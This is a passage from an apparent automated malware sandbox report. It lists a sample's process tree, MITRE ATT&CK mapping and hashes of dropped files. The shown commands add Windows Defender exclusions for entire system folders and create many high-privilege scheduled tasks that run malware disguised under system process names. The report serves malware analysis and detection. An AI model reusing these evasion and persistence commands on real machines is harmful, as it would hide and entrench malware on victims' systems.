        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1472
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:748
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
        
        C:\agentBrowsersavesRefBroker\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/agentBrowsersavesRefBroker/'
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2876
        
        C:\Users\Public\Recorded TV\Sample Media\conhost.exe
        
        "C:\Users\Public\Recorded TV\Sample Media\conhost.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Recovery\c0f67622-1a8a-11ed-ae9f-b21da26d38ed\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\c0f67622-1a8a-11ed-ae9f-b21da26d38ed\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Recovery\c0f67622-1a8a-11ed-ae9f-b21da26d38ed\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Windows\System32\ias\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\ias\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Windows\System32\ias\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Journal\en-US\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\en-US\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Journal\en-US\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\agentBrowsersavesRefBroker\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\agentBrowsersavesRefBroker\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\agentBrowsersavesRefBroker\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\microsoft shared\DAO\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\microsoft shared\DAO\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\microsoft shared\DAO\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\agentBrowsersavesRefBroker\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\agentBrowsersavesRefBroker\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\agentBrowsersavesRefBroker\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Windows\Vss\Writers\System\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\System\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\Vss\Writers\System\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\agentBrowsersavesRefBroker\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\agentBrowsersavesRefBroker\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\agentBrowsersavesRefBroker\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\Setup\State\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Setup\State\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\State\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Recovery\c0f67622-1a8a-11ed-ae9f-b21da26d38ed\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\c0f67622-1a8a-11ed-ae9f-b21da26d38ed\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Recovery\c0f67622-1a8a-11ed-ae9f-b21da26d38ed\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Recent\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Default\Recent\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Recent\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\MSOCache\All Users\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Recorded TV\Sample Media\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Recorded TV\Sample Media\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Recorded TV\Sample Media\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SurrogateDllS" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\SurrogateDll.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SurrogateDll" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\SurrogateDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SurrogateDllS" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\SurrogateDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\KeWzk8OD4y.bat

Filesize
211B

MD5
1e825437044a3677239129a0c0849dd0

SHA1
2619ae63012baafc1613d6c50210ce830d83a946

SHA256
95d428517a291fe9752d946a6332407920c014decd677e786c4161f848349cd4

SHA512
07493bee24e203065ea2e3a6715d289116202667e59a4edb481e48aa39cfa5f72580ab91fc2c7b564eb9a219cf3e7aa5782b1f48f11bdec8bc5e360658ce14a9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
96a53abd2c22efb1ccbff6078f166ba0

SHA1
5c52d49c17fe1fa852d01189c1e533ab90d7baac

SHA256
25f7500274801bd80b1d27c221a0d228f47d4c8145fdb34aba946a8df01d992c

SHA512
e52ddfea97638055275b7077fe3a4473e9d8c5b748413e5bee70d94856c06a0fbe00b8f6783e0882a154fe075901f8cb65225dfca57e490002a567585dd8119e

Download Submit
C:\Users\Public\Recorded TV\Sample Media\conhost.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\Users\Public\Recorded TV\Sample Media\conhost.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\DYj6G9.bat

Filesize
48B

MD5
5bb1a4946c35c47dd502dfbcd6d3a3d7

SHA1
1e1e42c5996031e92e8314c45201ccbf1fa23607

SHA256
30921e7d9a89121e8d56de5182e7e487f8e02293e82e82c2c04a6a537150ef06

SHA512
87a63b9f407a21db0cc2d80e3b639833e5e9f790790a9fc69a65788b193af80e19717ac4dc449190cc69817b161aabaf4a9c338e8936c6907adf5c432f7156e1

Download Submit
C:\agentBrowsersavesRefBroker\SurrogateDll.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\SurrogateDll.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\SurrogateDll.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\metokn3Gpa5i.vbe

Filesize
209B

MD5
22bdc192d231db2480148ba60871353b

SHA1
511712d83287343407b489ffbba56f1543062496

SHA256
442844f37559614e588adbd17a56c93e76687efdc6757a8aa0510e87b5a9fd22

SHA512
b7f044b2e707f474d7b5cba6fd4dd484debd04a7f7a80b81d81a1a9b49c8f85746804f5382770b338bdaf2471b09734deb5b0fdf30daa82e610435418866e444

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\agentBrowsersavesRefBroker\powershell.exe

Filesize
1.7MB

